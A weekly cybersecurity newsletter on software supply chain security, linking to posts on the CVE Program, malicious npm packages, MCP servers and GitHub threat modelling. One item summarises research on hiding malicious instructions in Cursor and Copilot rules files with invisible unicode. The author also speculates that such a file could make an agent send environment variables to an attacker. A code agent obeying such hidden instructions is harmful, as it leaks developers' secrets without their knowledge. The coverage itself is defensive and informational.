CramHacks Chronicles #79: Weekly Cybersecurity Newsletter!

Hello, and Happy Monday!

I’m looking forward to speaking at OWASP San Diego tomorrow and making more people feel like we’re all doomed thanks to supply chain security 🫠.

In all seriousness, someone recently pointed out to me how far the industry has come in just the last few years. They were totally right; I’m trying to be less pessimistic about the current state of things. But to be fair, the current state is still pretty freak’n terrible.

Special thank you to OX Security for sponsoring this week’s newsletter! Fun fact, I own a neuroscience textbook. But I’ve read maybe 20 pages . . . one day 😀.

Unless you live under a rock, you probably heard that MITRE was only hours away from losing funding, and no longer supporting the CVE Program. Since then, CISA has announced that funding for MITRE's contract has been extended 🎉.

This was a rollercoaster. I particularly enjoyed how those who regularly bash on the CVE Program were suddenly mad that it might no longer exist. 🤔

Has this stirred the pot and caused redundancy plans and/or privatized vulnerability databases to be more desirable? I guess we’ll find out! That said, the European Union Agency for Cybersecurity (ENISA) did just launch the European vulnerability database (EUVD). Site is currently in beta.

Newsletter

Fifty Years of Open Source Software Supply Chain Security
Russ Cox, former Tech Lead of the Go programming language team (a position he held for more than a decade 🤯) discusses the evolution of software supply chain security, and how we’ve gotten to today. Topics covered include Authenticating Software, Making Builds Reproducible, Finding and Fixing Vulnerabilities, and Funding Open Source.

👋 After reading this, I came across a recording of a talk Russ gave at ACM SCORED: Open Source Supply Chain Security at Google, in 2023. Also a fantastic resource and would make for a great lecture (IMO). I’m looking forward to the day they begin to teach supply chain security in university.

Australian Signals Directorate: Guidelines for cryptography
“Note, for interoperability and maintainability reasons, HMAC-SHA256 will not be approved beyond 2030.”

👋 Can we talk about how cyber.gov.au pages have a complexity score, and this is somehow ‘moderate’? What the heck would be hard? 😆

Anatomy of Malicious Open Source Packages
SafeDep analyzed a random sample of the DataDog Malicious Packages Dataset using its LLM-powered static analysis engine to reveal common TTPs: 78% abused npm install hooks, 65% exfiltrated system information, and 52% used code obfuscation. More stats in the full post.

“Rules Files Backdoor”: How Hackers Can Weaponize Code Agents
Pillar Security’s Ziv Karliner highlights how Cursor’s Rules file and Copilot’s instructions file can be weaponized by injecting malicious instructions. Both file types also support hidden unicode characters, making the instructions invisible to developers. They’ve also provided a tool to scan rule files for backdoors.

👋 I honestly didn’t even know about these instruction files. What happens if an open source project adds one of these to their project, with malicious instructions (e.g., sends env variables to a controlled endpoint)? 🤔 

Understanding and Preventing Open-Source Software Supply Chain Attacks
Piergiorgio Ladisa recently shared his doctoral thesis; it focuses on solidifying the basics of malware campaigns relating to open source software packages, but the depth and historical context is incredible.

👋 I’m always in awe when people can turn something fairly sophisticated and difficult to talk about, into something as simple as a tree-representation. Here’s Piergiorgio doing exactly that: Risk Explorer for Software Supply Chains

Can Lessons from Software Supply Chain Security Be Applied to MCP?
Jose Miguel Parrella considers how supply chain technologies such as trusted publishers, provenance attestations, sandboxing, and enterprise policy hooks can be applied to MCP Servers.

👋 It’s time for me to go down the AI rabbit hole. From a supply chain perspective, I’m not eager to learn more about things like model poisoning. But MCP and Google’s Agent2Agent protocol are very clearly supply chain risks, and therefore . . . I must learn. MCP is giving big “security vs convenience” vibes. The current security concerns are very much real, but the convenience is there, and therefore adoption 📈.

Threat Modeling GitHub - How vulnerable-by-design Github is?
Srajan Gupta discusses existing risks within the GitHub platform, many of which have been long-discussed, but accepted as design-tradeoffs. Topics covered include: Supply Chain Attacks, Access Control Design, GitHub Actions & CI/CD Security, Secrets Management, Repository Security Design, and SHA1 Collision attacks.

Until Next Time! 👋

Hey, you made it to the bottom – thanks for sticking around!

Questions, ideas, or want to chat? Slide into my inbox! 💌

Don’t hesitate to forward if someone could benefit from this.

See you next Monday!
-Kyle

P.S. CramHacks has a Supporter tier! You can upgrade here to support CramHacks and its free weekly content 😃.